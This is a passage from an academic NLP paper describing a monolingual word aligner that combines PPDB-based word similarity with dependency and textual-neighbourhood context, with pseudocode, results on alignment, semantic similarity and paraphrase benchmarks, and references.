MANLI’s in terms of the information they encode (with some extensions). Contextual features include only semantic match of the left and the right neigh- bors of the two words and their POS tags. Even though JacanaAlign outperformed the MANLI en- hancements despite having less contextual features, it is difficult to compare the role of context in the two models because of the large paradigmatic dispar- ity. An extension of JacanaAlign was proposed for phrasal alignments in (Yao et al., 2013b), but the contextual features remained largely unchanged. Noticeable in all the above systems is the use of contextual evidence as a feature for alignment, but in our opinion, not to an extent sufficient to harness its full potential. Even though deeper dependency- based modeling of contextual commonalities can be found in some other studies (Kouylekov and Magnini, 2005; Chambers et al., 2007; Chang et al., 2010; Yao et al., 2013c), we believe there is further scope for systematic exploitation of contextual evidence for alignment, which we aim to do in this work. On the contrary, word semantic similarity has been a central component of most aligners; various mea- sures of word similarity have been utilized, including string similarity, resource-based similarity (derived from one or more lexical resources like WordNet) 220 Align identical word sequences Align named entities Align content words Align stop words Figure 1: System overview and distributional similarity (computed from word co-occurrence statistics in large corpora). An impor- tant trade-off between precision, coverage and speed exists here and aligners commonly rely on only a subset of these measures (Thadani and McKeown, 2011; Yao et al., 2013a). We use the Paraphrase Database (PPDB) (Ganitkevitch et al., 2013), which is a large resource of lexical and phrasal paraphrases constructed using bilingual pivoting (Bannard and Callison-Burch, 2005) over large parallel corpora. 3 System Our system operates as a pipeline of alignment mod- ules that differ in the types of word pairs they align. Figure 1 is a simplistic representation of the pipeline. Each module makes use of contextual evidence to make alignment decisions. In addition, the last two modules are informed by a word semantic similarity algorithm. Because of their phrasal nature, we treat named entities separately from other content words. The rationale behind the order in which the modules are arranged is discussed later in this section (3.3.5). Before discussing each alignment module in de- tail, we describe the system components that identify word and contextual similarity. 3.1 Word Similarity The ability to correctly identify semantic similarity between words is crucial to our aligner, since con- textual evidence is important only for similar words. Instead of treating word similarity as a continuous variable, we define three levels of similarity. The first level is an exact word or lemma match which is represented by a similarity score of 1. The second level represents semantic similarity between two terms which are not identical. To identify such word pairs, we employ the Paraphrase Database (PPDB)1. We use the largest (XXXL) of the PPDB’s lexical paraphrase packages and treat all pairs iden- tically by ignoring the accompanying statistics. We 1http://paraphrase.org customize the resource by removing pairs of identi- cal words or lemmas and adding lemmatized forms of the remaining pairs. For now, we use the term ppdbSim to refer to the similarity of each word pair in this modified version of PPDB (which is a value in (0, 1)) and later explain how we determine it (Section 3.3.5). Finally, any pair of different words which is absent in PPDB is assigned a zero similarity score. 3.2 Extracting Contextual Evidence Our alignment modules collect contextual evidence from two complementary sources: syntactic depen- dencies and words occurring within a small textual vicinity of the two words to be aligned. The applica- tion of each kind assumes a common principle of min- imal evidence. Formally, given two input sentences S and T , we consider two words s ∈ S and t ∈ T to form a candidate pair for alignment if ∃rs ∈ S and ∃rt ∈ T such that: 1. (s,t) ∈ <Sim and (rs,rt) ∈ <Sim, where <Sim is a binary relation indicating sufficient semantic relatedness between the members of each pair (≥ ppdbSim in our case). 2. (s,rs) ∈ <C1 and (t,rt) ∈ <C2 , such that <C1 ≈<C2 ; where <C1 and <C2 are binary re- lations representing specific types of contextual relationships between two words in a sentence (e.g., an nsubj dependency between a verb and a noun). The symbol ≈ represents equivalence between two relationships, including identical- ity. Note that the minimal-evidence assumption holds a single piece of contextual evidence as sufficient support for a potential alignment; but as we discuss later in this section, an evidence for word pair (s,t) (where s ∈ S and t ∈ S) may not lead to an align- ment if there exists a competing pair (s′, t) or (s,t′) with more evidence (where s′ ∈ S and t′ ∈ T ). In the rest of this section, we elaborate the different forms of contextual relationships we exploit along with the notion of equivalence between relationships. 3.2.1 Syntactic Dependencies Dependencies can be important sources of con- textual evidence. Two nsubj children rs and rt of two verbs s ∈ S and t ∈ T , for example, pro- vide evidence for not only an (s,t) alignment, but 221 S: He wrote a book . nsubj dobj det T : I read the book he wrote . nsubj dobj det rcmod nsubj Figure 2: Equivalent dependency types: dobj and rcmod also an (rs,rt) alignment if (s,t) ∈ <Sim and (rs,rt) ∈ <Sim. (We adopt the Stanford typed de- pendencies (de Marneffe and Manning, 2008).) Moreover, dependency types can exhibit equiva- lence; consider the two sentences in Figure 2. The dobj dependency in S is equivalent to the rcmod dependency in T (dobj ≈ rcmod, following our ear- lier notation) since they represent the same semantic relation between identical word pairs in the two sen- tences. To be able to use such evidence for alignment, we need to go beyond exact matching of dependen- cies and develop a mapping among dependency types that encodes such equivalence. Note also that the parent-child roles are opposite for the two depen- dency types in the above example, a scenario that such a mapping must accommodate. The four possible such scenarios regarding parent- child orientations are shown in Figure 3. If (s,t) ∈ <Sim and (rs,rt) ∈ <Sim (represented by bidirec- tional arrows), then each orientation represents a set of possible ways in which the S and T dependen- cies (unidirectional arrows) can provide evidence of similarity between the contexts of s in S and t in T . Each such set comprises equivalent dependency type pairs for that orientation. In the example of Figure 2, (dobj, rcmod) is such a pair for orientation (c), given s = t = “wrote” and rs = rt = “book”. We apply the notion of dependency type equiva- lence to intra-category alignment of content words in four major lexical categories: verbs, nouns, adjectives and adverbs (the Stanford POS tag- ger (Toutanova et al., 2003) is used to identify the categories). Table 1 shows dependency type equiva- lences for each lexical category of s and t. The ‘←’ sign on column 5 of some rows repre- sents a duplication of the column 4 content of the s rs t rt rs s rt t s rs t rt s rs t rt (a) (b) (c) (d) Figure 3: Parent-child orientations in dependencies same row. For each row, columns 4 and 5 show two sets of dependency types; each member of the first is equivalent to each member of the second for the current orientation (column 1) and lexical categories of the associated words (columns 2 and 3). For exam- ple, row 2 represents the fact that an agent relation (between s and rs; s is the parent) is equivalent to an nsubj relation (between t and rt; t is the parent). Note that the equivalences are fundamentally re- dundant across different orientations. For example, row 2 (which is presented as an instance of ori- entation (a)) can also be presented as an instance of orientation (b) with POS(s)=POS(t)=noun and POS(rs)=POS(rt)=verb. We avoid such redundancy for compactness. For the same reason, the equiva- lence of dobj and rcmod in Figure 2 is shown in the table only as an instance of orientation (c) and not as an instance of orientation (d) (in general, this is why orientations (b) and (d) are absent in the table). We present dependency-based contextual evidence extraction in Algorithm 1. (The Stanford dependency parser (de Marneffe et al., 2006) is used to extract the dependencies.) Given a word pair (si, tj) from the in- put sentences S and T , it collects contextual evidence (as indexes of rsi and rtj with a positive similarity) for each matching row in Table 1. An exact match of the two dependencies is also considered a piece of evidence. Note that Table 1 only considers con- tent word pairs (si, tj) such that POS(si)=POS(tj), but as 90% of all content word alignments in the MSR alignment dev set are within the same lexical category, this is a reasonable set to start with. 3.2.2 Textual Neighborhood While equivalent dependencies can provide strong contextual evidence, they can not ensure high recall because, a) the ability to accurately extract depen- 222 Orientation POS(s, t) POS(rs, rt) S Dependency Types T Dependency Types s rs t rt verb verb {purpcl, xcomp} ←− noun {agent, nsubj, xsubj} ←− {dobj, nsubjpass, rel} ←− {tmod, prep in, prep at, prep on} ←− {iobj, prep to} ←− noun verb {infmod, partmod, rcmod} ←− (a) noun {pos, nn, prep of, prep in, prep at, prep for} ←− adjective {amod, rcmod} ←− s rs t rt verb verb {conj and} ←− {conj or} ←− {conj nor} ←− noun {dobj, nsubjpass, rel} {infmod, partmod, rcmod} adjective {acomp} {cop, csubj} noun noun {conj and} ←− {conj or} ←− {conj nor} ←− adjective {amod, rcmod} {nsubj} adjective adjective {conj and} ←− {conj or} ←− (c) {conj nor} ←− adverb adverb {conj and} ←− {conj or} ←− {conj nor} ←− Table 1: Equivalent dependency structures Algorithm 1: depContext(S,T,i,j,EQ) Input: 1. S, T : Sentences to be aligned 2. i: Index of a word in S 3. j: Index of a word in T 4. EQ: Dependency type equivalences (Table 1) Output: context = {(k,l)}: pairs of word indexes context ←{(k,l) : wordSim(sk, tl) > 01 ∧ (i,k,τs) ∈ dependencies(S)2 ∧ (j, l,τt) ∈ dependencies(T)3 ∧POS(si) = POS(tj) ∧POS(sk) = POS(tl)4 ∧ (τs = τt5 ∨ (POS(si),POS(sk),τs,τt) ∈ EQ))}6 dencies is limited by the accuracy of the parser, and b) we investigate equivalence types for only inter- lexical-category alignment in this study. Therefore we apply an additional model of word context: the textual neighborhood of s in S and t in T . Extraction of contextual evidence for content words from textual neighborhood is described in Al- gorithm 2. Like the dependency-based module, it accumulates evidence for each (si, tj) pair by in- specting multiple pairs of neighboring words. But in- stead of aligning only words within a lexical category, Algorithm 2: textContext(S,T,i,j, STOP) Input: 1. S, T : Sentences to be aligned 2. i: Index of a word in S 3. j: Index of a word in T 4. STOP: A set of stop words Output: context = {(k,l)}: pairs of word indexes Ci ←{k : k ∈ [i− 3, i + 3] ∧k 6= i∧sk 6∈ STOP}1 Cj ←{l : l ∈ [j − 3,j + 3] ∧ l 6= j ∧ tl 6∈ STOP}2 context ← Ci ×Cj3 this module also performs inter-category alignment, considering content words within a (3, 3) window of si and tj as neighbors. We implement relational equivalence (≈) here by holding any two positions within the window equally contributive and mutually comparable as sources of contextual evidence. 3.3 The Alignment Algorithm We now describe each alignment module in the pipeline and their sequence of operation. 3.3.1 Identical Word Sequences The presence of a common word sequence in S and T is indicative of an (a) identical, and (b) con- 223 textually similar word in the other sentence for each word in the sequence. We observe the results of aligning identical words in such sequences of length n containing at least one content word. This simple heuristic demonstrates a high precision (≈ 97%) on the MSR alignment dev set for n ≥ 2, and therefore we consider membership in such sequences as the simplest form of contextual evidence in our system and align all identical word sequence pairs in S and T containing at least one content word. From this point on, we will refer to this module as wsAlign. 3.3.2 Named Entities We align named entities separately to enable the alignment of full and partial mentions (and acronyms) of the same entity. We use the Stanford Named Entity Recognizer (Finkel et al., 2005) to identify named entities in S and T . After aligning the exact term matches, any unmatched term of a partial mention is aligned to all terms in the full mention. The mod- ule recognizes only first-letter acronyms and aligns an acronym to all terms in the full mention of the corresponding name. Since named entities are instances of nouns, named entity alignment is also informed by contextual ev- idence (which we discuss in the next section), but happens before alignment of other generic content words. Parents (or children) of a named entity are simply the parents (or children) of its head word. We will refer to this module as a method named neAlign from this point on. 3.3.3 Content Words Extraction of contextual evidence for promising content word pairs has already been discussed in Section 3.2, covering both dependency-based context and textual context. Algorithm 3 (cwDepAlign) describes the dependency-based alignment process. For each potentially alignable pair (si, tj), the dependency- based context is extracted as described in Algorithm 1, and context similarity is calculated as the sum of the word similarities of the (sk, tl) context word pairs (lines 2-7). (The wordSim method returns a similarity score in {0, ppdbSim, 1}.) The alignment score of the (si, tj) pair is then a weighted sum of word and contextual similarity (lines 8-12). (We discuss how the weights are set in Section Algorithm 3: cwDepAlign(S,T,EQ,AE,w, STOP) Input: 1. S, T : Sentences to be aligned 2. EQ: Dependency type equivalences (Table 1) 3. AE: Already aligned word pair indexes 4. w: Weight of word similarity relative to contex- tual similarity 5. STOP: A set of stop words Output: A = {(i,j)}: word index pairs of aligned words {(si, tj)} where si ∈ S and tj ∈ T Ψ ← ∅; ΛΨ ← ∅; Φ ← ∅1 for si ∈ S,tj ∈ T do2 if si 6∈ STOP ∧¬∃tl : (i, l) ∈ AE3 ∧ tj 6∈ STOP ∧¬∃sk : (k,j) ∈ AE4 ∧wordSim(si, tj) > 0 then5 context ← depContext(S,T,i,j,EQ)6 contextSim ← ∑ (k,l)∈context wordSim(sk, tl) 7 if contextSim > 0 then8 Ψ ← Ψ ∪{(i,j)}9 ΛΨ(i,j) ← context10 Φ(i,j) ← w ∗wordSim(si, tj)11 +(1 −w) ∗ contextSim12 Linearize and sort Ψ in decreasing order of Φ(i,j)13 A ← ∅14 for (i,j) ∈ Ψ do15 if ¬∃l : (i, l) ∈ A16 ∧¬∃k : (k,j) ∈ A then17 A ← A∪{(i,j)}18 for (k,l) ∈ ΛΨ(i,j) do19 if ¬∃q : (k,q) ∈ A∪AE20 ∧¬∃p : (p,l) ∈ A∪AE then21 A ← A∪{(k,l)}22 3.3.5.) The module then aligns (si, tj) pairs with non-zero evidence in decreasing order of this score (lines 13-18). In addition, it aligns all the pairs that contributed contextual evidence for the (si, tj) alignment (lines 19-22). Note that we implement a one-to-one alignment whereby a word gets aligned at most once within the module. Algorithm 4 (cwTextAlign) presents alignment based on similarities in the textual neighborhood. For each potentially alignable pair (si, tj), Algorithm 2 is used to extract the context, which is a set of neigh- boring content word pairs (lines 2-7). The contextual similarity is the sum of the similarities of these pairs 224 Algorithm 4: cwTextAlign(S,T,AE,w, STOP) Input: 1. S, T : Sentences to be aligned 2. AE: Existing alignments by word indexes 3. w: Weight of word similarity relative to contex- tual similarity 4. STOP: A set of stop words Output: A = {(i,j)}: word index pairs of aligned words {(si, tj)} where si ∈ S and tj ∈ T Ψ ← ∅; Φ ← ∅1 for si ∈ S, tj ∈ T do2 if si 6∈ STOP ∧¬∃tl : (i, l) ∈ AE3 ∧ tj 6∈ STOP ∧¬∃sk : (k,j) ∈ AE4 ∧wordSim(si, tj) > 0 then5 Ψ ← Ψ ∪{(i,j)}6 context ← textContext(S,T,i,j, STOP)7 contextSim ← ∑ (k,l)∈context wordSim(sk, tl) 8 Φ(i,j) ← w ∗wordSim(si, tj)9 + (1 −w) ∗ contextSim10 Linearize and sort Ψ in decreasing order of Φ(i,j)11 A ← ∅12 for (i,j) ∈ Ψ do13 if ¬∃l : (i, l) ∈ A14 ∧¬∃k : (k,j) ∈ A then15 A ← A∪{(i,j)}16 (line 8), and the alignment score is a weighted sum of word similarity and contextual similarity (lines 9, 10). The alignment score is then used to make one-to-one word alignment decisions (lines 11-16). Considering textual neighbors as weaker sources of evidence, we do not align the neighbors. Note that in cwTextAlign we also align semanti- cally similar content word pairs (si, tj) with no con- textual similarities if no pairs (sk, tj) or (si, tl) exist with a higher alignment score. This is a consequence of our observation of the MSR alignment dev data, where we find that more often than not content words are inherently sufficiently meaningful to be aligned even in the absence of contextual evidence when there are no competing pairs. The content word alignment module is thus itself a pipeline of cwDepAlign and cwTextAlign. 3.3.4 Stop Words We follow the contextual evidence-based approach to align stop words as well, some of which get aligned Algorithm 5: align(S,T,EQ,w, STOP) Input: 1. S, T : Sentences to be aligned 2. EQ: Dependency type equivalences (Table 1) 3. w: Weight of word similarity relative to contex- tual similarity 4. STOP: A set of stop words Output: A = {(i,j)}: word index pairs of aligned words {(si, tj)} where si ∈ S and tj ∈ T A ← wsAlign(S,T)1 A ← A∪neAlign(S,T,EQ,A,w)2 A ← A∪ cwDepAlign(S,T,EQ,A,w, STOP)3 A ← A∪ cwTextAlign(S,T,A,w, STOP)4 A ← A∪swDepAlign(S,T,A,w, STOP)5 A ← A∪swTextAlign(S,T,A,w, STOP)6 as part of word sequence alignment as discussed in Section 3.3.1, and neighbor alignment as discussed in Section 3.3.3. For the rest we utilize dependen- cies and textual neighborhoods as before, with three adjustments. Firstly, since stop word alignment is the last mod- ule in our pipeline, rather than considering all se- mantically similar word pairs for contextual similar- ity, we consider only aligned pairs. Secondly, since many stop words (e.g. determiners, modals) typi- cally demonstrate little variation in the dependencies they engage in, we ignore type equivalences for stop words and implement only exact matching of depen- dencies. (Stop words in general can participate in equivalent dependencies, but we leave constructing a corresponding mapping for future work.) Finally, for textual neighborhood, we separately check align- ments of the left and the right neighbors and aggre- gate the evidences to determine alignment – again due to the primarily syntactic nature of interaction of stop words with their neighbors. Thus stop words are also aligned in a sequence of dependency and textual neighborhood-based align- ments. We assume two corresponding modules named swDepAlign and swTextAlign, respectively. 3.3.5 The Algorithm Our full alignment pipeline is shown as the method align in Algorithm 5. Note that the strict order of the alignment modules limits the scope of downstream modules since each such module discards any word that has already been aligned by an earlier module 225 (this is accomplished via the variable A; the corre- sponding parameter in Algorithms 3 and 4 is AE). The rationales behind the specific order of the mod- ules can now be explained: (1) wsAlign is a module with relatively higher precision, (2) it is convenient to align named entities before other content words to en- able alignment of entity mentions of different lengths, (3) dependency-based evidence was observed to be more reliable (i.e. of higher precision) than textual evidence in the MSR alignment dev set, and (4) stop word alignments are dependent on existing content word alignments. The aligner assumes two free parameters: ppdbSim and w (in Algorithms 3 and 4). To determine their values, we exhaustively search through the two-dimensional space (ppdbSim,w) for ppdbSim,w ∈{0.1, ..., 0.9, 1} and the combina- tion (0.9, 0.9) yields the best F1 score for the MSR alignment dev set. We use these values for the aligner in all of its subsequent applications. 4 Evaluation We evaluate the performance of our aligner both in- trinsically and extrinsically on multiple corpora. 4.1 Intrinsic Evaluation The MSR alignment dataset2 (Brockett, 2007) was designed to train and directly evaluate automated aligners. Three annotators individually aligned words and phrases in 1600 pairs of premise and hypothe- sis sentences from the RTE2 challenge data (divided into dev and test sets, each consisting of 800 sen- tences). The dataset has subsequently been used to assess several top performing aligners (MacCartney et al., 2008; Thadani and McKeown, 2011; Yao et al., 2013a; Yao et al., 2013b). We use the test set for evaluation in the same manner as these studies: (a) we apply majority rule to select from the three sets of annotations for each sentence and discard three- way disagreements, (b) we evaluate only on the sure links (word pairs that annotators mentioned should certainly be aligned, as opposed to possible links). We test the generalizability of the aligner by eval- uating it, unchanged (i.e. with identical parameter values), on a second alignment corpus: the Edin- 2http://www.cs.biu.ac.il/ nlp/files/RTE 2006 Aligned.zip System P% R% F1% E% M SR MacCartney et al. (2008) 85.4 85.3 85.3 21.3 Thadani & McKeown (2011) 89.5 86.2 87.8 33.0 Yao et al. (2013a) 93.7 84.0 88.6 35.3 Yao et al. (2013b) 92.1 82.8 86.8 29.1 This Work 93.7 89.8 91.7 43.8 E D B ++ Yao et al. (2013a) 91.3 82.0 86.4 15.0 Yao et al. (2013b) 90.4 81.9 85.9 13.7 This Work 93.5 82.5 87.6 18.3 Table 2: Results of intrinsic evaluation on two datasets burgh++3 (Thadani et al., 2012) corpus. The test set consists of 306 pairs; each pair is aligned by at most two annotators and we adopt the random selection policy described in (Thadani et al., 2012) to resolve disagreements. Table 2 shows the results. For each corpus, it shows precision (% alignments that matched with gold annotations), recall (% gold alignments discov- ered by the aligner), F1 score and the percentage of sentences that received the exact gold alignments (denoted by E) from the aligner. On the MSR test set, our aligner shows a 3.1% improvement in F1 score over the previous best sys- tem (Yao et al., 2013a) with a 27.2% error reduction. Importantly, it demonstrates a considerable increase in recall without a loss of precision. The E score also increases as a consequence. On the Edinburgh++ test set, our system achieves a 1.2% increase in F1 score (an error reduction of 8.8%) over the previous best system (Yao et al., 2013a), with improvements in both precision and recall. This is a remarkable result that demonstrates the general applicability of the aligner, as no parameter tuning took place. 4.1.1 Ablation Test We perform a set of ablation tests to assess the importance of the aligner’s individual components. Each row of Table 3 beginning with (-) shows a fea- ture excluded from the aligner and two associated sets of metrics, showing the performance of the re- sulting algorithm on the two alignment corpora. Without a word similarity module, recall drops as would be expected. Without contextual evidence (word sequences, dependencies and textual neigh- bors) precision drops considerably and recall also falls. Without dependencies, the aligner still gives 3http://www.ling.ohio-state.edu/∼scott/#edinburgh-plusplus 226 MSR EDB++ Feature P% R% F1% P% R% F1% Original 93.7 89.8 91.7 93.5 82.5 87.6 (-) Word Similarity 95.2 86.3 90.5 95.1 77.3 85.3 (-) Contextual Evidence 81.3 86.0 83.6 86.4 80.6 83.4 (-) Dependencies 94.2 88.8 91.4 93.8 81.3 87.1 (-) Text Neighborhood 85.5 90.4 87.9 90.4 84.3 87.2 (-) Stop Words 94.2 88.3 91.2 92.2 80.0 85.7 Table 3: Ablation test results state-of-the-art results, which points to the possibility of a very fast yet high-performance aligner. Without evidence from textual neighbors, however, the preci- sion of the aligner suffers badly. Textual neighbors find alignments across different lexical categories, a type of alignment that is currently not supported by our dependency equivalences. Extending the set of dependency equivalences might alleviate this is- sue. Finally, without stop words (i.e. while aligning content words only) recall drops just a little for each corpus, which is expected as content words form the vast majority of non-identical word alignments. 4.2 Extrinsic Evaluation We extrinsically evaluate our system on textual simi- larity identification and paraphrase detection. Here we discuss each task and the results of evaluation. 4.2.1 Semantic Textual Similarity Given two short input text fragments (commonly sentences), the goal of this task is to identify the degree to which the two fragments are semantically similar. The *SEM 2013 STS task (Agirre et al., 2013) assessed a number of STS systems on four test datasets by comparing their output scores to human annotations. Pearson correlation coefficient with hu- man annotations was computed individually for each test set and a weighted sum of the correlations was used as the final evaluation metric (the weight for each dataset was proportional to its size). We apply our aligner to the task by aligning each sentence pair and taking the proportion of content words aligned in the two sentences (by normalizing with the harmonic mean of their number of content words) as a proxy of their semantic similarity. Only three of the four STS 2013 datasets are freely avail- able4 (headlines, OnWN, and FNWN), which we use for our experiments (leaving out the SMT dataset). 4http://ixa2.si.ehu.es/sts/ System Correl.% Rank Han et al. (2013) 73.7 1 (original) JacanaAlign 46.2 66 This Work 67.2 7 Table 4: Extrinsic evaluation on STS 2013 data These three sets contain 1500 annotated sentence pairs in total. Table 4 shows the results. The first row shows the performance of the top system in the task. With a direct application of our aligner (no parameter tun- ing), our STS algorithm acheives a 67.15% weighted correlation, which would earn it the 7th rank among 90 participating systems. Considering the fact that alignment is one of many components of STS, this result is truly promising. For comparison, we also evaluate the previous best aligner named JacanaAlign (Yao et al., 2013a) on STS 2013 data (the JacanaAlign public release5 is used, which is a version of the original aligner with extra lexical resources). We apply three different val- ues derived from its output as proxies of semantic similarity: a) aligned content word proportion, b) the Viterbi decoding score, and c) the normalized decod- ing score. Of the three, (b) gives the best results, which we show in row 2 of Table 4. Our aligner outperforms JacanaAlign by a large margin. 4.2.2 Paraphrase Identification The goal of paraphrase identification is to decide if two sentences have the same meaning. The output is a yes/no decision instead of a real-valued similarity score as in STS. We use the MSR paraphrase cor- pus6 (4076 dev pairs, 1725 test pairs) (Dolan et al., 2004) to evaluate our aligner and compare with other aligners. Following earlier work (MacCartney et al., 2008; Yao et al., 2013b), we use a normalized align- ment score of the two sentences to make a decision based on a threshold which we set using the dev set. Alignments with a higher-than-threshold score are taken to be paraphrases and the rest non-paraphrases. Again, this is an oversimplified application of the aligner, even more so than in STS, since a small change in linguistic properties of two sentences (e.g. polarity or modality) can turn them into non- 5https://code.google.com/p/jacana/ 6http://research.microsoft.com/en-us/downloads/607d14d9- 20cd-47e3-85bc-a2f65cd28042/ 227 System Acc.% P% R% F1% Madnani et al. (2012) 77.4 79.0 89.9 84.1 Yao et al. (2013a) 70.0 72.6 88.1 79.6 Yao et al. (2013b) 68.1 68.6 95.8 79.9 This Work 73.4 76.6 86.4 81.2 Table 5: Extrinsic evaluation on MSR paraphrase data paraphrases despite having a high degree of align- ment. So the aligner was not expected to demonstrate state-of-the-art performance, but still it gets close as shown in Table 5. The first column shows the accu- racy of each system in classifying the input sentences into one of two classes: true (paraphrases) and false (non-paraphrases). The rest of the columns show the performance of the system for the true class in terms of precision, recall, and F1 score. Italicized numbers represent scores that were not reported by the authors of the corresponding papers, but have been recon- structed from the reported data (and hence are likely to have small precision errors). The first row shows the best performance by any system on the test set to the best of our knowledge. The next two rows show the performances of two state-of-the-art aligners (performances of both sys- tems were reported in (Yao et al., 2013b)). The last row shows the performance of our aligner. Al- though it does worse than the best paraphrase system, it outperforms the other aligners. 5 Discussion Our experiments reveal that a word aligner based on simple measures of lexical and contextual similar- ity can demonstrate state-of-the-art accuracy. How- ever, as alignment is frequently a component of larger tasks, high accuracy alone is not always sufficient. Other dimensions of an aligner’s usability include speed, consumption of computing resources, replica- bility, and generalizability to different applications. Our design goals include achieving a balance among such multifarious and conflicting goals. A speed advantage of our aligner stems from for- mulating the problem as one-to-one word alignment and thus avoiding an expensive decoding phase. The presence of multiple phases is offset by discarding already aligned words in subsequent phases. The use of PPDB as the only (hashable) word similarity resource helps in reducing latency as well as space requirements. As shown in Section 4.1.1, further speedup could be achieved with only a small perfor- mance degradation by considering only the textual neighborhood as source of contextual evidence. However, the two major goals that we believe the aligner achieves to the greatest extent are replicabil- ity and generalizability. The easy replicability of the aligner stems from its use of only basic and fre- quently used NLP modules (a lemmatizer, a POS tagger, an NER module, and a dependency parser: all available as part of the Stanford CoreNLP suite7; we use a Python wrapper8) and a single word similarity resource (PPDB). We experimentally show that the aligner can be successfully applied to different alignment datasets as well as multiple end tasks. We believe a design characteristic that enhances the generalizability of the aligner is its minimal dependence on the MSR alignment training data, which originates from a tex- tual entailment corpus having unique properties such as disparities in the lengths of the input sentences and a directional nature of their relationship (i.e., the premise implying the hypothesis, but not vice versa). A related potential reason is the symmetry of the aligner’s output (caused by its assumption of no directionality) – the fact that it outputs the same set of alignments regardless of the order of the input sentences, in contrast to most existing aligners. Major limitations of the aligner include the inabil- ity to align phrases, including multiword expressions. It is incapable of capturing and exploiting long dis- tance dependencies among words (e.g. coreferences). No word similarity resource is perfect and PPDB is no exception, therefore certain word alignments also remain undetected. 6 Conclusions We show how contextual evidence can be used to construct a monolingual word aligner with certain de- sired properties, including state-of-the-art accuracy, easy replicability, and high generalizability. Some potential avenues for future work include: allow- ing phrase-level alignment via phrasal similarity re- sources (e.g. the phrasal paraphrases of PPDB), in- cluding other sources of similarity such as vector space models or WordNet relations, expanding the set 7http://nlp.stanford.edu/downloads/corenlp.shtml 8https://github.com/dasmith/stanford-corenlp-python 228 of dependency equivalences and/or using semantic role equivalences, and formulating our alignment al- gorithm as objective optimization rather than greedy search. The aligner is available for download at https://github.com/ma-sultan/ monolingual-word-aligner. Acknowledgments This material is based in part upon work supported by the National Science Foundation under Grant Num- bers EHR/0835393 and EHR/0835381. Any opin- ions, findings, and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the Na- tional Science Foundation. References Eneko Agirre, Daniel Cer, Mona Diab, Aitor Gonzalez- Agirre, and Weiwei Guo. 2013. *SEM 2013 shared task: Semantic Textual Similarity. In Proceedings of the Second Joint Conference on Lexical and Compu- tational Semantics. Association for Computational Linguistics, 32-43. Colin Bannard and Chris Callison-Burch. 2005. Para- phrasing with Bilingual Parallel Corpora. In Proceed- ings of the 43rd Annual Meeting on Association for Computational Linguistics. Association for Computa- tional Linguistics, 597-604. Daniel Bär, Chris Biemann, Iryna Gurevych, and Torsten Zesch. 2012. UKP: computing semantic textual sim- ilarity by combining multiple content similarity mea- sures. In Proceedings of the First Joint Conference on Lexical and Computational Semantics. Association for Computational Linguistics, 435-440. Roy Bar-Haim, Ido Dagan, Bill Dolan, Lisa Ferro, Danilo Giampiccolo, Bernardo Magnini, and Idan Szpektor. 2006. The Second PASCAL Recognising Textual En- tailment Challenge. In Proceedings of The Second PASCAL Recognising Textual Entailment Challenge. Chris Brockett. 2007. Aligning the RTE 2006 Cor- pus. Technical Report MSR-TR-2007-77, Microsoft Research. Nathanael Chambers, Daniel Cer, Trond Grenager, David Hall, Chloe Kiddon, Bill MacCartney, Marie-Catherine de Marneffe, Daniel Ramage, Eric Yeh, and Christopher D Manning. 2007. Learning alignments and leverag- ing natural logic. In Proceedings of the ACL-PASCAL Workshop on Textual Entailment and Paraphrasing As- sociation for Computational Linguistics, 165-170. Ming-Wei Chang, Dan Goldwasser, Dan Roth, and Vivek Srikumar. 2010. Discriminative Learning over Con- strained Latent Representations. In Proceedings of the 2010 Annual Conference of the North American Chap- ter of the Association for Computational Linguistics Association for Computational Linguistics, 429-437. Dipanjan Das and Noah A. Smith. 2009. Paraphrase Iden- tication as Probabilistic Quasi-Synchronous Recogni- tion. In Proceedings of the Joint Conference of the 47th Annual Meeting of the ACL and the 4th International Joint Conference on Natural Language Processing of the AFNLP. Association for Computational Linguistics, 468-476. Marie-Catherine de Marneffe, Bill MacCartney, and Christopher D. Manning. 2006. Generating Typed Dependency Parses from Phrase Structure Parses. In Proceedings of the International Conference on Lan- guage Resources and Evaluation. 449-454. Marie-Catherine de Marneffe and Christopher D. Man- ning. 2008. Stanford typed dependencies manual. Technical Report, Stanford University. Bill Dolan, Chris Quirk, and Chris Brockett. 2004. Un- supervised Construction of Large Paraphrase Corpora: Exploiting Massively Parallel News Sources. In Pro- ceedings of the International Conference on Compu- tational Linguistics. Association for Computational Linguistics, 350-356. Jenny Rose Finkel, Trond Grenager, and Christopher Man- ning. 2005. Incorporating Non-local Information into Information Extraction Systems by Gibbs Sampling. In Proceedings of the 43rd Annual Meeting of the Associ- ation for Computational Linguistics. Association for Computational Linguistics, 363-370. Juri Ganitkevitch, Benjamin Van Durme, and Chris Callison-Burch. 2013. PPDB: The Paraphrase Database. In Proceedings of the 2013 Conference of the North American Chapter of the Association for Com- putational Linguistics. Association for Computational Linguistics, 758-764. Lushan Han, Abhay Kashyap, Tim Finin, James Mayeld, and Jonathan Weese. 2013. UMBC EBIQUITY-CORE: Semantic Textual Similarity Systems. In Proceedings of the Second Joint Conference on Lexical and Compu- tational Semantics, Volume 1. Association for Compu- tational Linguistics, 44-52. Andrew Hickl and Jeremy Bensley. 2007. A Discourse Commitment-Based Framework for Recognizing Tex- tual Entailment. In Proceedings of the ACL-PASCAL Workshop on Textual Entailment and Paraphrasing. As- sociation for Computational Linguistics, 171-176. Andrew Hickl, Jeremy Bensley, John Williams, Kirk Roberts, Bryan Rink, and Ying Shi. 2006. Recog- nizing Textual Entailment with LCCs GROUNDHOG 229 System. In Proceedings of the Second PASCAL Chal- lenges Workshop on Recognizing Textual Entailment. Milen Kouylekov and Bernardo Magnini. 2005. Rec- ognizing textual entailment with tree edit distance al- gorithms. In Proceedings of the PASCAL Challenges Workshop: Recognising Textual Entailment Challenge 17-20. Bill MacCartney, Michel Galley, and Christopher D. Man- ning. 2008. A Phrase-Based Alignment Model for Nat- ural Language Inference. In Proceedings of the 2008 Conference on Empirical Methods in Natural Language Processing. Association for Computational Linguistics, 802-811. Nitin Madnani, Joel Tetreault, and Martin Chodorow. 2012. Re-examining Machine Translation Metrics for Paraphrase Identification. In Proceedings of 2012 Con- ference of the North American Chapter of the Associ- ation for Computational Linguistics. Association for Computational Linguistics, 182-190. Kapil Thadani and Kathleen McKeown. 2011. Optimal and Syntactically-Informed Decoding for Monolingual Phrase-Based Alignment. In Proceedings of the 49th Annual Meeting of the Association for Computational Linguistics: Human Language Technologies. Associa- tion for Computational Linguistics, 254-259. Kapil Thadani, Scott Martin, and Michael White. 2012. A Joint Phrasal and Dependency Model for Paraphrase Alignment. In Proceedings of COLING 2012: Posters. 1229-1238. Kristina Toutanova, Dan Klein, Christopher D. Manning, and Yoram 